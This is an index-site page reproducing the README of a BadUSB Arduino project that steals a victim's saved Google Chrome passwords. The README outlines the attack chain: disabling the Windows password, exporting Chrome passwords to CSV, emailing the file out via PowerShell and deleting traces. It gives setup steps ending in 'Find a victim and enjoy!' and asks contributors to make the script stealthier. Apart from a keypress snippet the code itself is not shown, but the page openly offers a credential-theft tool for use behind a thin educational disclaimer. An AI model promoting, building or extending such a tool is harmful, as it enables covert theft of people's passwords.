An open API service indexing awesome lists of open source software.

https://github.com/tuconnaisyouknow/chromepassstealer

This script makes your BadUSB steal all the victim's Google Chrome password.
https://github.com/tuconnaisyouknow/chromepassstealer

arduino bad-usb badusb duckyscript dump dumper email gmail google-chrome googlechrome grabber password smtp steal stealer usb-hid

Last synced: 4 months ago
JSON representation

This script makes your BadUSB steal all the victim's Google Chrome password.

Awesome Lists containing this project

README

          

# đŸĨˇ ChromePassStealer
🚨 **This project is no longer updated.** If you want a better script, click [here](https://github.com/tuconnaisyouknow/BadUSB_passStealer).
## âš ī¸ Warning
Everything in this repository is **strictly** for educational purposes. **I am not responsible** for any stolen data. **You are responsible** for your actions when using this script with **BadUSB**.
## â„šī¸ About
Many people who are not well-informed about **cybersecurity** save their **passwords** in **Google Chrome** for convenience. This script **exploits** this weakness to **steal** all saved passwords.
### đŸ› ī¸ How it works:
1ī¸âƒŖ **Disables Windows password** using PowerShell.
2ī¸âƒŖ **Opens Google Chrome** and downloads a **.csv file** containing all saved passwords.
3ī¸âƒŖ **Sends the file by email** via PowerShell.
4ī¸âƒŖ **Deletes traces** by removing the file and closing Chrome.
## 🔑 Key Information for Users
### 🎹 Important Note #1 – Keyboard Layout Adaptation
Sometimes, you might see this in the code:
```arduino
Keyboard.press(KEY_LEFT_CTRL);
Keyboard.press(KEY_LEFT_ALT);
Keyboard.press(173);
Keyboard.releaseAll();
```
This is used to type characters like `@` or `\`, but it depends on the **keyboard layout**. 👉 **Adapt these characters** using this [ASCII table](https://www.csee.umbc.edu/portal/help/theory/ascii.txt) or simply **switch the keyboard layout to French**.
### 👀 Important Note #2 – Visibility Issue
âš ī¸ The script **is not yet optimized** for stealth. The victim **can see** their computer acting on its own.
### 🕒 Important Note #3 – Adjusting Delay
You can **customize the delay** based on how fast you plug in the **BadUSB**.
## 🚀 Getting Started
## 📌 Requirements
âœ”ī¸ A **BadUSB**
âœ”ī¸ Install **Arduino software** [here](https://www.arduino.cc/en/software)
âœ”ī¸ A **Gmail** account with **"Less Secure Apps"** enabled [here](https://www.google.com/settings/security/lesssecureapps) *(if required)*
## âš™ī¸ Installation
1ī¸âƒŖ **Download this repository**
🔹 **Linux:**
```bash
git clone https://github.com/tuconnaisyouknow/ChromePassStealer
cd ChromePassStealer
```
🔹 **Windows:**
- Click the **green "Code" button** at the top right.
- Click **"Download ZIP"** and extract it.
2ī¸âƒŖ **Replace your email and password** in:
- [`ChromePassStealer.ino`](https://github.com/tuconnaisyouknow/ChromePassStealer/blob/main/ChromePassStealer.ino)
*(Lines 238, 245, 253, 264)*
3ī¸âƒŖ **Upload the script to your BadUSB** using **Arduino software**.
4ī¸âƒŖ **Find a victim and enjoy!** 🎭
## đŸ–Ĩī¸ Requirements for the Victim's PC
âœ”ī¸ **Turn off Caps Lock**
âœ”ī¸ **Switch the keyboard layout to French** *(or adapt the code accordingly)*
## 🆘 Help Me â›‘ī¸
I want to **make the script run in the background** and perform all actions from **Chrome directly via PowerShell**. If you have any ideas, feel free to contribute! 🚀